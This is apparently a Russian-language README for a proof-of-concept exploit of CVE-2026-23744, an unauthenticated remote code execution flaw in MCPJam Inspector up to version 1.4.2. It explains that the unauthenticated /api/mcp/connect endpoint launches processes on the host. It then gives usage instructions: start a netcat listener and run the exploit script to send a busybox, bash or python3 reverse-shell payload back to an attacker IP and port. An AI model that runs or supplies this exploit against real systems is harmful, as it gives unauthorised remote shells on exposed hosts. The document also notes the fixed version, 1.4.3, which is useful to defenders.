
CVE-2026-23744 — эксплойт доказательства концепции для неаутентифицированной уязвимости удаленного выполнения кода в MCPJam Inspector <= 1.4.2.
MCPJam Inspector <= 1.4.2 по умолчанию привязывается к 0.0.0.0 и открывает /api/mcp/connect без какой-либо аутентификации. Конечная точка принимает объект serverConfig, который запускает процесс непосредственно на хосте — передача полезной нагрузки reverse shell дает немедленное RCE без необходимости в учетных данных.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| Флаг | Описание | По умолчанию |
|---|---|---|
-u | URL цели | обязательно |
-i | Ваш IP прослушивателя (LHOST) | обязательно |
-p | Ваш порт прослушивателя (LPORT) | обязательно |
-m | Метод полезной нагрузки: busybox, bash, python3 | busybox |
Шаг 1 — Запустите свой прослушиватель:
nc -lvnp 4444
Шаг 2 — Запустите эксплойт:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
Если busybox не работает на цели, попробуйте другие методы:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| Программа | Уязвимая | Исправленная |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |